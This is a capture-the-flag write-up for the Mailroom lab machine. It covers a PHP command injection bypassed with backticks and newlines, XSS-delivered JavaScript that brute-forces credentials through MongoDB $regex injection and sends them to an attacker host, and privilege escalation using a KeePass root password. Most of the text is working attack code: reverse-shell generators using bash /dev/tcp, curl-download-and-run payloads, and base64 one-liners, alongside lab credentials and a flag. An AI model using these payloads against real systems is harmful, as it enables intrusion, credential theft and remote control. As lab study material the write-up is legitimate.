=== Entries ===
0. food account                                            door.dash.local
1. GItea Admin account                                    git.mailroom.htb
2. gitea database password
3. My Gitea Account                                       git.mailroom.htb
4. root acc
kpcli:/Root> show -f -a 4
Title: root acc
Uname: root
 Pass: a$gBa3!GA8
  URL:
Notes: root account for sysadmin jobs
Icon#: 0
Creat: 2023-03-15 21:43:57
Modif: 2023-03-15 21:44:42
Xpire: Never
kpcli:/Root> quit
matthew@mailroom:~$ kpcli  --kdb ~/personal.kdbx
Please provide the master password: *************************
KeePass CLI (kpcli) v3.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.
kpcli:/> ls
=== Groups ===
Root/
kpcli:/> cd Root/
kpcli:/Root> ls
=== Entries ===
0. food account                                            door.dash.local
1. GItea Admin account                                    git.mailroom.htb
2. gitea database password
3. My Gitea Account                                       git.mailroom.htb
4. root acc
kpcli:/Root> show -a -f 4
Title: root acc
Uname: root
 Pass: a$gBa3!GA8
  URL:
Notes: root account for sysadmin jobs
Icon#: 0
Creat: 2023-03-15 21:43:57
Modif: 2023-03-15 21:44:42
Xpire: Never
kpcli:/Root> quit
matthew@mailroom:~$
matthew@mailroom:/tmp$ su -
Password:
root@mailroom:~# ls
cleanup.sh  cleanup.sh.bak  containers  kpcli.sh  matthew_kpcli.py  matthew_kpcli.py.bak  personal.kdbx  personal.kdbx.bak  root.txt
root@mailroom:~# cat root.txt
7fe0c9a1297e4b3fb9ab8259c67c63a1
root@mailroom:~#
root@mailroom:~# docker ps -a
CONTAINER ID   IMAGE                    COMMAND                  CREATED        STATUS        PORTS                               NAMES
ed9dafc5f146   containers_sites         "docker-php-entrypoi…"   14 hours ago   Up 14 hours   0.0.0.0:80->80/tcp, :::80->80/tcp   containers_sites_1
be13e7868b63   gitea/gitea:1.18         "/usr/bin/entrypoint…"   14 hours ago   Up 14 hours   22/tcp, 3000/tcp                    containers_gitea_1
a792a1685ae4   postgres:15.1-bullseye   "docker-entrypoint.s…"   14 hours ago   Up 14 hours   5432/tcp                            containers_db_1
178ce6c64a6b   mongo:4.2.23             "docker-entrypoint.s…"   14 hours ago   Up 14 hours   27017/tcp                           containers_mongodb_1
root@mailroom:~# id
uid=0(root) gid=0(root) groups=0(root)
root@mailroom:~# # This step should no longer be needed
# docker exec -it containers_sites_1  /bin/bash -c 'chmod +s /bin/bash'

Guess: once root logs in successfully, the perl and kpcli processes are both gone.

See below; the guess was wrong: the kpcli process is started every minute, and the cleanup runs every 3 minutes

root@mailroom:~# cat ~/cleanup.sh
#!/bin/bash

# Clear inquiries
/usr/bin/rm -rf /root/containers/sites/mailroom/inquiries/*

# Copy back template inquiry
/usr/bin/cp /root/containers/5657465f7712d50b2aaceaa09453c71f.html /root/containers/sites/mailroom/inquiries/

# Restore gitea
/usr/bin/rm -rf /root/containers/gitea/*
/usr/bin/cp -r /root/containers/gitea_backup/* /root/containers/gitea/

# Clear tmp files
/usr/bin/rm -rf /tmp/*

# Clear past emails
echo "$(tail -n 10 /var/mail/tristan)" > /var/mail/tristan
root@mailroom:~# crontab  -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h  dom mon dow   command
*/3 * * * * /root/cleanup.sh >/dev/null 2>&1
*/1 * * * * /root/kpcli.sh >/dev/null 2>&1
root@mailroom:~# 

Let's see how this VM target performs:

root@mailroom:/tmp# df -h
Filesystem                         Size  Used Avail Use% Mounted on
udev                               1.9G     0  1.9G   0% /dev
tmpfs                              391M   41M  350M  11% /run
/dev/mapper/ubuntu--vg-ubuntu--lv  7.2G  5.4G  1.5G  79% /
tmpfs                              2.0G     0  2.0G   0% /dev/shm
tmpfs                              5.0M     0  5.0M   0% /run/lock
tmpfs                              2.0G     0  2.0G   0% /sys/fs/cgroup
/dev/sda2                          219M  108M   93M  54% /boot
overlay                            7.2G  5.4G  1.5G  79% /var/lib/docker/overlay2/68f15147525c63cc344606e5b29fc4ec921f656f55260b4600bc178cb459378a/merged
overlay                            7.2G  5.4G  1.5G  79% /var/lib/docker/overlay2/f029f39ea36301cfff86726028ab27e9734acd9199aee23fc6bae7334b411020/merged
shm                                 64M  1.1M   63M   2% /var/lib/docker/containers/a792a1685ae42e12a2e997b16ba6e2d3bd8eb2fb9009379ed9aea1b2f087881a/mounts/shm
shm                                 64M     0   64M   0% /var/lib/docker/containers/178ce6c64a6be27a55a5dbb37dde1d2786c6e610c78e36c911e159dee2573f1c/mounts/shm
overlay                            7.2G  5.4G  1.5G  79% /var/lib/docker/overlay2/0bd824ad9f75604012958f36946a505389003d86fca4aeebafee5633ed3cf974/merged
shm                                 64M     0   64M   0% /var/lib/docker/containers/be13e7868b6371a6be9a28388202b131848556634f13b20060263e1571460ca3/mounts/shm
overlay                            7.2G  5.4G  1.5G  79% /var/lib/docker/overlay2/15152d7d89f89bb8394707d53a1787872a40454a4d6b656724f11167ca53b6e5/merged
shm                                 64M     0   64M   0% /var/lib/docker/containers/ed9dafc5f146dd54611d8e00e4f8cf5a302418effcf64de39f628f9c50599600/mounts/shm
tmpfs                              391M     0  391M   0% /run/user/1000
tmpfs                              391M     0  391M   0% /run/user/0
tmpfs                              391M     0  391M   0% /run/user/1001
root@mailroom:/tmp# free -m
              total        used        free      shared  buff/cache   available
Mem:           3901         600        1439          56        1860        2953
Swap:          2047           0        2047
root@mailroom:/tmp#

Get the source of http://staff-review-panel.mailroom.htb/inspect.php:

docker cp containers_sites_1:/var/www/staffroom/inspect.php /home/
scp -P 40022 -o StrictHostKeyChecking=no /home/inspect.php root@10.10.14.37:/tmp/

With the HTML markup removed, it reads as follows:

<?php
session_start(); // Start a session
// Check if authorized
if (!isset($_SESSION['logged_in']) || $_SESSION['logged_in'] !== true) {
    header('Location: index.php'); // The user is NOT logged in, redirect back to the login page
    exit;
}
$data = '';
if (isset($_POST['inquiry_id'])) {
    $inquiryId = preg_replace('/[\$<>;|&{}\(\)\[\]\'\"]/', '', $_POST['inquiry_id']);
    $contents = shell_exec("cat /var/www/mailroom/inquiries/$inquiryId.html");
    // Parse the data between  and </p>
    $start = strpos($contents, '<p class="lead mb-0">');
    if ($start === false) {
        // Data not found
        $data = 'Inquiry contents parsing failed';
    } else {
        $end = strpos($contents, '</p>', $start);
        $data = htmlspecialchars(substr($contents, $start + 21, $end - $start - 21));
    }
}
$status_data = '';
if (isset($_POST['status_id'])) {
    $inquiryId = preg_replace('/[\$<>;|&{}\(\)\[\]\'\"]/', '', $_POST['status_id']);
    $contents = shell_exec("cat /var/www/mailroom/inquiries/$inquiryId.html");
    // Parse the data between  and </p>
    $start = strpos($contents, '<p class="lead mb-1">');
    if ($start === false) {
        // Data not found
        $status_data = 'Inquiry contents parsing failed';
    } else {
        $end = strpos($contents, '</p>', $start);
        $status_data = htmlspecialchars(substr($contents, $start + 21, $end - $start - 21));
    }
}
?>
<?php echo $_SESSION['name']; ?> <?php echo $data; ?> <?php echo $status_data; ?>

There is a session check, so a valid logged-in PHPSESSID is needed first. The two lines that matter are:

$inquiryId = preg_replace('/[\$<>;|&{}\(\)\[\]\'\"]/', '', $_POST['inquiry_id']);
$contents = shell_exec("cat /var/www/mailroom/inquiries/$inquiryId.html");
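The blocklist above removes $ < > ; | & { } ( ) [ ] ' " but nothing else, which is why the payloads further down rely on backticks and newlines. The following is an added example (not code from the page or from the box) that mirrors the same character class, lists which shell metacharacters survive it, and shows the allowlist check a fixed inspect.php would use instead; the function names and the list of metacharacters tested are my own choices.

```javascript
// Same character class as the PHP: preg_replace('/[\$<>;|&{}\(\)\[\]\'\"]/', '', ...)
const BLOCKLIST = /[$<>;|&{}()\[\]'"]/g;

// Mirror of the PHP filter: strip the listed characters, keep everything else.
function stripBlocklist(inquiryId) {
  return inquiryId.replace(BLOCKLIST, "");
}

// Characters that change meaning once the value lands inside
// shell_exec("cat /var/www/mailroom/inquiries/$inquiryId.html") (assumed test set).
const SHELL_SPECIAL = ["`", "\n", "$", ";", "|", "&", "(", ")", "{", "}",
                       "<", ">", "'", '"', "\\", "*", "?"];

// Subset of SHELL_SPECIAL the blocklist leaves untouched: backtick and newline
// (command substitution and command separation), plus backslash and globs.
function survivingMetachars() {
  return SHELL_SPECIAL.filter((c) => stripBlocklist(c) === c);
}

// The command string exactly as inspect.php builds it after filtering.
// Built for inspection only; never executed here.
function buildCommand(inquiryId) {
  return "cat /var/www/mailroom/inquiries/" + stripBlocklist(inquiryId) + ".html";
}

// Hardened variant: an inquiry id is a file name, so accept only a plain name
// and reject everything else instead of stripping characters out of it.
function isSafeInquiryId(inquiryId) {
  return /^[A-Za-z0-9_-]{1,64}$/.test(inquiryId);
}

function buildCommandSafe(inquiryId) {
  if (!isSafeInquiryId(inquiryId)) return null;
  return "cat /var/www/mailroom/inquiries/" + inquiryId + ".html";
}
```

Running `survivingMetachars()` is the quick check: if a backtick or a newline comes back, command substitution and multi-line payloads still work regardless of how many other characters the blocklist removes.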

In the original video the file is first downloaded with curl into /tmp and then run with bash as a second step. I came up with a clumsy way of doing it in a single request:

The script that generates r0.sh (run on Kali; it picks up the tun0 address and writes the reverse shell into /tmp/r0.sh):


myip2=$(ip addr show tun0 | grep -Po '(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])(\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)){3}' | head -n 1)
cat <<EOF >/tmp/r0.sh
id;
touch /tmp/XYZ;
setsid nc -lnvvp 10080 &
bash -i >& /dev/tcp/$myip2/88 0>&1
EOF
cat /tmp/r0.sh;

The raw inquiry_id value (each backtick group is executed by the shell as a command substitution while it builds the argument for cat):

`sleep 2``curl -o /tmp/AA5 http://10.10.14.37:77/r0.sh``bash /tmp/AA5``echo 1`

URL-encoded and sent with the session cookie:

curl -v -d "inquiry_id=\`sleep+2\`\`curl+-o+/tmp/1r2+http://10.10.14.37:77/r0.sh\`\`bash+/tmp/1r2\`\`echo+1\`" -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" http://staff-review-panel.mailroom.htb/inspect.php

The nc inside the container does not support -e, so nc alone can only open a forward (bind) backdoor that we connect to with telnet; it cannot give a reverse shell. The reverse connection above therefore comes from bash's /dev/tcp instead.

root@ed9dafc5f146:/var/www/html# which nc
/bin/nc
root@ed9dafc5f146:/var/www/html#
root@ed9dafc5f146:/var/www/html# nc -e
nc: invalid option -- 'e'
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
          [-m minttl] [-O length] [-P proxy_username] [-p source_port]
          [-q seconds] [-s sourceaddr] [-T keyword] [-V rtable] [-W recvlimit]
          [-w timeout] [-X proxy_protocol] [-x proxy_address[:port]]
          [destination] [port]
root@ed9dafc5f146:/var/www/html# # nc 10.10.14.37 88 -e /bin/sh

Because newlines are not filtered either, we can also use line breaks to run several statements (use --data-binary so curl keeps the newlines):


curl -v --data-binary "inquiry_id=\`sleep+12
curl+-o+/tmp/3r2+http://10.10.14.37:77/r0.sh
bash+/tmp/3r2
echo+-n+1\`" -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" \
http://staff-review-panel.mailroom.htb/inspect.php

The following variant does not give a reverse shell (the original note left the reason open). The reason is in how the shell treats the result of a command substitution: the output of `curl ... r2.sh` is only word-split into extra arguments for cat (cat /var/www/mailroom/inquiries/bash -c '{curl,...}|bash.html'), it is never re-parsed as a new pipeline, so the `bash -c` inside r2.sh is never executed. With shell_exec("$inquiryId") the substituted text itself becomes the command line, its first word is bash, and it runs.

Submitted parameter:

`  ``curl http://127.0.0.1:77/r2.sh``  `
#  shell_exec("$inquiryId");      # works with the line above
#  shell_exec("cat $inquiryId");  # does not work

curl -v -d "inquiry_id=\`+\`\`curl+http://10.10.14.37:77/r2.sh\`\`+\`" \
-H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" \
http://staff-review-panel.mailroom.htb/inspect.php

The script that generates r1.sh:

myip2=$(ip addr show tun0 | grep -Po '(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])(\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)){3}' | head -n 1)
cat <<EOF >/tmp/r1.sh
bash -i >& /dev/tcp/$myip2/88 0>&1
EOF
cat /tmp/r1.sh;

The script that generates r2.sh (brace expansion {curl,URL} avoids spaces in the downloaded stage):

myip2=$(ip addr show tun0 | grep -Po '(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])(\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)){3}' | head -n 1)
cat <<EOF >/tmp/r2.sh
bash -c {curl,http://$myip2:77/r1.sh}|bash
EOF
cat /tmp/r2.sh;

Combining this with the newline trick for running several statements gives another approach: put the command substitution on its own line, so its output (a line starting with bash -c ...) becomes a command of its own rather than an argument to cat.

No file needs to be written on the target; the statements are executed directly.

First generate r8.sh on the local Kali box (the reverse shell is base64-encoded so the one-liner contains no spaces or quotes):

myip2=$(ip addr show tun0 | grep -Po '(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])(\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)){3}' | head -n 1)
w2=`echo "bash -i >& /dev/tcp/$myip2/88 0>&1" | base64`
echo $w2;
echo $w2 | base64 -d;
cat <<EOF >/tmp/r8.sh
bash -c {echo,$w2}|{base64,-d}|{bash,-i}
EOF
cat /tmp/r8.sh;

Then, from the ssh session as tristan@10.10.11.209 (the staff panel only accepts connections from localhost), send the curl request:

curl -v -d "inquiry_id=../../../../proc/cpuinfo
\`+\`\`curl+http://10.10.14.50:30088/r8.sh\`\`+\`
touch+/tmp/" -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878"  \
http://staff-review-panel.mailroom.htb/inspect.php

The reverse shell connects back successfully.

Tip:

When brute-forcing the username and password through the XSS, how do we get more than 30 seconds?

Testing showed that the Firefox on the target does not block window.open() popups, so a popup can be used to extend the time; it is even possible to open many browser pages and use Kali as a reverse proxy so that they reach internet sites.

curl -v -d 'email=qax%40gmail.com&title=maga2023&message=<script+src%3d"http%3a//10.10.14.50:30088/loader_user.js"></script><script+src%3d"http%3a//10.10.14.50:8090/?c=123"></script>'   http://mailroom.htb/contact.php

Update the index.php served on port 8090 (it holds the connection open for 120 seconds with CORS enabled):

echo "<?php header('Content-Type: application/x-javascript; charset=UTF-8');\
header('Access-Control-Allow-Origin: *');\
header('Access-Control-Allow-Headers: *');\
set_time_limit(300);sleep(120);\
echo 'console.log(120);';">/tmp/index.php ;

Source of loader_user.js:

function dateTimeToStringS(date, format) {
    if (date) {
        var o = {
            "M+": date.getMonth() + 1,                                   // month
            "d+": date.getDate(),                                        // day
            "h+": date.getHours() % 12 == 0 ? 12 : date.getHours() % 12, // 12-hour
            "H+": date.getHours(),                                       // hour
            "m+": date.getMinutes(),                                     // minute
            "s+": date.getSeconds(),                                     // second
            "q+": Math.floor((date.getMonth() + 3) / 3),                 // quarter
            "S": date.getMilliseconds()                                  // ms
        };
        var week = {"0": "\u65e5", "1": "\u4e00", "2": "\u4e8c", "3": "\u4e09", "4": "\u56db", "5": "\u4e94", "6": "\u516d"};
        if (/(y+)/.test(format)) {
            format = format.replace(RegExp.$1, (date.getFullYear() + "").substr(4 - RegExp.$1.length));
        }
        if (/(E+)/.test(format)) {
            format = format.replace(RegExp.$1, ((RegExp.$1.length > 1) ? (RegExp.$1.length > 2 ? "\u661f\u671f" : "\u5468") : "") + week[date.getDay() + ""]);
        }
        for (var k in o) {
            if (new RegExp("(" + k + ")").test(format)) {
                format = format.replace(RegExp.$1, (RegExp.$1.length == 1) ? (o[k]) : (("00" + o[k]).substr(("" + o[k]).length)));
            }
        }
        return format;
    }
}
window.onunload = function () {
    fetch("http://10.10.14.50:30088/guess_username.js?fetch_unload_t=" + dateTimeToStringS(new Date(), "yyyy-MM-dd-HH:mm:ss.S"));
};
window.onbeforeunload = function () {
    fetch("http://10.10.14.50:30088/guess_username.js?fetch_beforeunload_t=" + dateTimeToStringS(new Date(), "yyyy-MM-dd-HH:mm:ss.S"));
};
fetch("http://10.10.14.50:30088/guess_username.js?fetch_first_t=" + dateTimeToStringS(new Date(), "yyyy-MM-dd-HH:mm:ss.S"));
setTimeout(function () {
    window.open("http://10.10.14.50:30088/loader_html.html?time=" + dateTimeToStringS(new Date(), "yyyy-MM-dd-HH:mm:ss.S"));
}, 10000);
setTimeout(function () {
    opener = null;
    open('', '_self');
    close();
}, 60000);
// driver.set_page_load_timeout(30): the page is closed after 30 seconds (the python ai.py process ends), so the 60-second timer is never reached

Source of loader_html.html (the popup page that loads both brute-force scripts):

<!DOCTYPE html>
<html lang="en">
<head><title>guess_username</title></head>
<body>
<script src='http://10.10.14.50:30088/guess_username.js'></script>
<script src='http://10.10.14.50:30088/guess_password.js'></script>
</body>
</html>

Updated guess_username.js source:

/*
fetch("http://10.10.14.50:30088/xss.js?gu=" + 100 * Math.random()).then(
    (res3) => {
        var t2 = res3.text();
        t2.then((y3) => {
            //console.log(y3);
            eval(y3);
        });
        //console.log(res3,t2);
        return t2;
    }
);
*/
async function callAuth(mail) {
    var http = new XMLHttpRequest();
    http.open('POST', "http://staff-review-panel.mailroom.htb/auth.php", true);
    http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    http.onload = function () {
        if (/"success":true/.test(this.responseText)) {
            notify(mail);
            cal("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%'()+, -/:;<=>@[\]_`{}~", mail);
        }
    };
    http.send("email[$regex]=.*" + mail + "@mailroom.htb&password[$ne]=abc");
}
function notify(mail) {
    fetch("http://10.10.14.50:30088/r8.sh?" + mail);
}
function cal(chars, mail) {
    for (var i = 0; i < chars.length; i++) {
        callAuth(chars[i] + mail);
    }
}
var chars88 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%'()+, -/:;<=>@[\]_`{}~";
cal(chars88, "");
console.log("5201314_maga");
fetch("http://10.10.14.50:30088/guess_username.js?in_fetch_guest_username.js=" + 100 * Math.random());
window.onunload = function () {
    fetch("http://10.10.14.50:30088/guess_username.js?fetch_unload_ut=" + 100 * Math.random());
};
window.onbeforeunload = function () {
    fetch("http://10.10.14.50:30088/guess_username.js?fetch_beforeunload_ut=" + 100 * Math.random());
};
setTimeout(function () {
    opener = null;
    open('', '_self');
    close();
}, 60000); // close after 60 seconds; the whole firefox-esr process then exits
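The guess_username.js above and its guess_password.js counterpart fire every candidate in parallel, never escape the candidate character, and have no notion of "value complete", so a password containing a regex metacharacter such as + or ( is never recovered and the scripts simply stop reporting. The following is an added example, not the page's code: the same blind $regex extraction (suffix search for the email, prefix search for the password), done sequentially with escaping and an anchored completion check. The oracle is a constructed in-memory stand-in for what auth.php does with findOne(); USERS is sample data, and the second account is made up to exercise the escaping.

```javascript
// Constructed sample data standing in for the MongoDB users collection.
const USERS = [
  { email: "tristan@mailroom.htb", password: "69trisRulez!" },   // as recovered on the page
  { email: "matthew@mailroom.htb", password: "Pa.ss+word(1)" },  // made up, regex-hostile
];

// One field against one query value: a plain string is equality; an object may carry
// $regex and/or $ne, which is what PHP builds from email[$regex]=... / password[$ne]=...
function matchField(value, cond) {
  if (typeof cond === "string") return value === cond;
  if ("$regex" in cond && !new RegExp(cond.$regex).test(value)) return false;
  if ("$ne" in cond && value === cond.$ne) return false;
  return true;
}

// Stand-in for auth.php: "success":true iff findOne({email, password}) finds a document.
function authOracle(query) {
  return USERS.some((u) => matchField(u.email, query.email) && matchField(u.password, query.password));
}

// The page's character set plus '.', which the original omits.
const CHARSET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%'()+, -/:;<=>@[\\]_`{}~.";

// Every candidate goes into the pattern as a literal. Without this, '+', '(' or '['
// produce invalid or wrong patterns and the matching character is never found.
function escapeRegex(s) {
  return s.replace(/[.*+?^${}()|[\]\\\/]/g, "\\$&");
}

// Recover the local part of an email by growing a suffix leftwards (guess_username.js
// does the same with ".*<suffix>@mailroom.htb"); stops once the fully anchored pattern matches.
function extractEmailLocalPart(oracle, domain, maxLen = 64) {
  let known = "";
  while (known.length <= maxLen) {
    if (oracle({ email: { $regex: "^" + escapeRegex(known + domain) + "$" }, password: { $ne: "" } })) return known;
    const next = [...CHARSET].find((c) =>
      oracle({ email: { $regex: escapeRegex(c + known + domain) + "$" }, password: { $ne: "" } }));
    if (next === undefined) throw new Error("no candidate extends suffix " + JSON.stringify(known));
    known = next + known;
  }
  throw new Error("exceeded maxLen");
}

// Recover a password by growing a prefix (guess_password.js does the same with "^<prefix>").
function extractPassword(oracle, email, maxLen = 64) {
  let known = "";
  while (known.length <= maxLen) {
    if (oracle({ email, password: { $regex: "^" + escapeRegex(known) + "$" } })) return known;
    const next = [...CHARSET].find((c) =>
      oracle({ email, password: { $regex: "^" + escapeRegex(known + c) } }));
    if (next === undefined) throw new Error("no candidate extends prefix " + JSON.stringify(known));
    known += next;
  }
  throw new Error("exceeded maxLen");
}
```

Against the real target the oracle would be the XMLHttpRequest to auth.php with the same two form fields; the sequential loop costs one request per character tried instead of the parallel flood, which is what the 30-second page-load limit discussed below works against, but it is the only way to know where a value ends.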
Logs from the two listeners on Kali during one run (the static server on port 30088 serving the scripts, and the PHP server on port 8090 serving the index.php that sleeps 120 seconds); the username and password come back one character at a time:

[2023-05-03T12:03:31.693Z]  "GET /loader_user.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[Wed May  3 12:03:31 2023] 10.10.11.209:39216 Accepted
[2023-05-03T12:03:31.861Z]  "GET /guess_username.js?fetch_first_t=2023-05-03-12:03:30.634" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:41.920Z]  "GET /loader_html.html?time=2023-05-03-12:03:40.638" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:42.036Z]  "GET /guess_username.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:42.111Z]  "GET /guess_password.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:43.195Z]  "GET /guess_username.js?in_fetch_guest_username.js=32.70788844267638" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:43.572Z]  "GET /guess_password.js?6" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:44.285Z]  "GET /guess_password.js?69" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:45.954Z]  "GET /guess_password.js?69t" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:46.869Z]  "GET /guess_password.js?69tr" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:48.451Z]  "GET /guess_password.js?69tri" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:50.510Z]  "GET /guess_password.js?69tris" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:52.582Z]  "GET /r8.sh?n" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:53.417Z]  "GET /guess_password.js?69trisR" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:55.632Z]  "GET /r8.sh?an" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:57.588Z]  "GET /guess_password.js?69trisRu" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:59.363Z]  "GET /r8.sh?tan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:01.129Z]  "GET /guess_password.js?69trisRul" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:02.564Z]  "GET /r8.sh?stan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:04.469Z]  "GET /guess_password.js?69trisRule" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:06.678Z]  "GET /r8.sh?istan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:08.018Z]  "GET /guess_password.js?69trisRulez" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:09.113Z]  "GET /r8.sh?ristan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:09.905Z]  "GET /guess_password.js?69trisRulez!" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:11.824Z]  "GET /r8.sh?tristan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:13.160Z]  "GET /favicon.ico" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[Wed May  3 12:05:31 2023] 10.10.11.209:39216 [200]: GET /?c=123
[Wed May  3 12:05:31 2023] 10.10.11.209:39216 Closing

I am not yet fluent with git operations at this point. The Apache vhost configs from the sites container are below; note that 001-staffroom.conf only allows 127.0.0.1 and 172.19.0.1 but also sets Access-Control-Allow-Origin "*", which is what lets the XSS payload running in the internal Firefox read the auth.php responses the blind injection depends on:

root@3ae5bc817f72:/etc/apache2/sites-enabled# ls -al
total 8
drwxr-xr-x 1 root root 4096 Jan 17 19:56 .
drwxr-xr-x 1 root root 4096 Nov 15 04:17 ..
lrwxrwxrwx 1 root root   36 Jan 17 19:56 000-mailroom.conf -> ../sites-available/000-mailroom.conf
lrwxrwxrwx 1 root root   37 Jan 17 19:56 001-staffroom.conf -> ../sites-available/001-staffroom.conf
lrwxrwxrwx 1 root root   33 Jan 17 19:56 002-gitea.conf -> ../sites-available/002-gitea.conf
root@3ae5bc817f72:/etc/apache2/sites-enabled# cat 000-mailroom.conf
<VirtualHost *:80>
    ServerName mailroom.htb

    # Block access to template directory
    <Directory /var/www/mailroom/template>
        Require all denied
    </Directory>

    # Hide git directory
    RedirectMatch 404 /\.git

    # DocumentRoot
    DocumentRoot /var/www/mailroom
</VirtualHost>
root@3ae5bc817f72:/etc/apache2/sites-enabled# cat 001-staffroom.conf
<VirtualHost *:80>
    ServerName staff-review-panel.mailroom.htb

    # Allow CORS
    Header set Access-Control-Allow-Origin "*"

    # Block connections from outside localhost
    <Directory />
        Allow from 127.0.0.1
        Allow from 172.19.0.1
        Deny from all
    </Directory>

    # Hide git directory
    RedirectMatch 404 /\.git

    # DocumentRoot
    DocumentRoot /var/www/staffroom
</VirtualHost>
root@3ae5bc817f72:/etc/apache2/sites-enabled# cat 002-gitea.conf
<VirtualHost *:80>
    ServerName git.mailroom.htb

    # Access to gitea docker
    ProxyPass / http://gitea:3000/
    ProxyPassReverse / http://gitea:3000/
</VirtualHost>
root@3ae5bc817f72:/etc/apache2/sites-enabled#
